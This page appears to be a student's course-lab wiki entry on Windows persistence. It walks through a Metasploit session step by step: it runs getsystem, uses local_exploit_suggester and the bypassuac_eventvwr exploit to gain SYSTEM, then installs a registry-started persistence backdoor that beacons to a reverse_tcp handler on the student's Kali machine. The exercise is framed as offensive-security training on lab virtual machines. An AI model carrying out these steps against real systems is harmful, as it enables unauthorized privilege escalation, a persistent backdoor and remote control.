Week 9 Persistence - devinziegler/Devin-Tech-Journal GitHub Wiki

Persistence

Discussion

Threat actors persist in networks if the need to do so is one of their goals. They may persist to collect new information created by the organization. For example, if their goal is to steal intellectual property then they would persist to collect that information. It could be intellectual property such as the design of a new car, market segments that are being targeted, weapon systems, or any information that is of value. They can persist by injecting startup commands for a program in the Windows registry. The Windows registry is a large database of all settings for a Windows system. There is a Windows startup folder and any code that is added in that folder will automatically start after a system reboot, or they may inject code that executes when a specific user authenticates to the system.

The type of persistence you’re going to set up is going to have a program that beacons every 10 seconds. Beaconing means every 10 seconds, the program is going to try to connect to your Kali server. That effectively turns your Kali machine into a c2 server (or command and control). Once you set up the listener, then you’ll have another backdoor into their network.

Lab Preparation

  • Re-establish the reverse shell. Check to be sure your IP address didn’t change when you switch network adapters to NETSEC-WAN. I forgot you had to change it for the last lab. If it is different, you will need to recreate the backdoored WinSCP program.

Start the lab

Run the commands:

getuid

getsystem

SUBMISSION: Annotate the screenshot to show the current user and the output of “getsystem.” Based on what you see in the output, did the “getsystem” command work?

NOTE: getsystem is a meterpreter command that attempts to exploit vulnerabilities and obtain “SYSTEM” level access. Remember that the SYSTEM context is the highest level of privileges on a Windows system.

You’ll note that the ‘getsystem’ command did not work. In that case, we’ll use another module from Metasploit that will look for a ‘local privilege escalation’ attack.

When remote vulnerabilities are not an option, threat actors will attempt to gain access to a computer and, depending on their goals, they may want elevated privileges to persist or gain access to the resources they are targeting. In that case, they will attempt to search for credentials or determine if the current user is in an administrator group. If those fail, they will then check to see what software is installed on a computer. Since many organizations don’t keep their software updated on a regular basis, it is possible to leverage a ‘local privilege escalation’ attack if there is a software program that is vulnerable. The module you are about to run will automate the process of trying to find a local privilege escalation attack.

From the meterpreter prompt run the command:

background

Select “y” when asked if you want to background the process. The background command will keep the remote shell session open and allow you to continue using Metasploit. The module to use is the local_exploit_suggester. Run the command:

use post/multi/recon/local_exploit_suggester

Then run:

show options:

The main one you need to set is “SESSION.”

Run the command

sessions

and make a note of the numeric value in the “Id” field (the leftmost value).

alt_text

Then use that numeric Id to run the next command (change X to the numeric value of the Id field)

set SESSION X

Then run:

run

If you receive a message that the process was interrupted by the user,

alt_text

run the command exploit again.

You will see a long list of potential local privilege escalation vulnerabilities.

alt_text

You are welcome to play around with the various results to see which one works for you, though one that works is:

bypassuac_eventvwr

So you can run:

use exploit/windows/local/bypassuac_eventvwr

Then run:

show options

You’ll see the only one that needs to be set is “SESSION” so change X below to the numeric value used above for the SESSION.

set SESSION X

Then run:

exploit

It will look like the screenshot below:

alt_text

Regardless of the exploit used, you want to check to see if a Metasploit session was opened. At the meterpret prompt, run:

getuid

Note you are still joker. Now run:

getsystem

Note how you are running with the SYSTEM context. At this point, you have unrestricted access to the computer. You can create new accounts, delete accounts, or whatever else you want to achieve.

Creating Persistence

Next you want to create persistence. You are at the point where you can start learning to use the documentation for Metasploit. Below is a link to the Metasploit documentation for setting up persistence. Be sure you READ the entire document to understand what is going on with the attack. Set your Beacon to 10 seconds and be sure you change the IP address from the tutorial to the the IP of your Kali workstation.

After you run the create persistence command, then switch to your Windows 7 system and reboot it. Watch your Metasploit console too.

Metasploit Persistence:

https://www.offensive-security.com/metasploit-unleashed/meterpreter-service/

NOTE: If you receive an error that the persistence module is deprecated, you’ll need to use the module “exploit/windows/local/persistence”

To do so, from your msfconsole, type the command “background”

That will take you back to the console for Metasploit. Then run:

use exploit/windows/local/persistence

set SESSION X

set LPORT 443

exploit

That will create a visual basic script which will be added to the Windows registry to start the backdoor after the user reboots and logs in to their system.

Then, while at your msfconsole, run the commands:

use exploit/multi/handler

set PAYLOAD windows/meterpreter/reverse_tcp

set LHOST IP_OF_YOUR_KALI_HOST

set LPORT 443

exploit

Then switch to your Windows 7 workstation and reboot it. Watch your Metasploit console when your system reboots.

SUBMISSION:

  1. Provide the command you used to setup persistence. If you had to use the “exploit/windows/local/persistence” then take a screenshot of the console with the command and options you set. Sorry about the issue with this part of the lab. I need to figure out how our versions are so different.
  2. What did you like the most and least about this lab?
  3. What additional questions do you have?
⚠️ **GitHub.com Fallback** ⚠️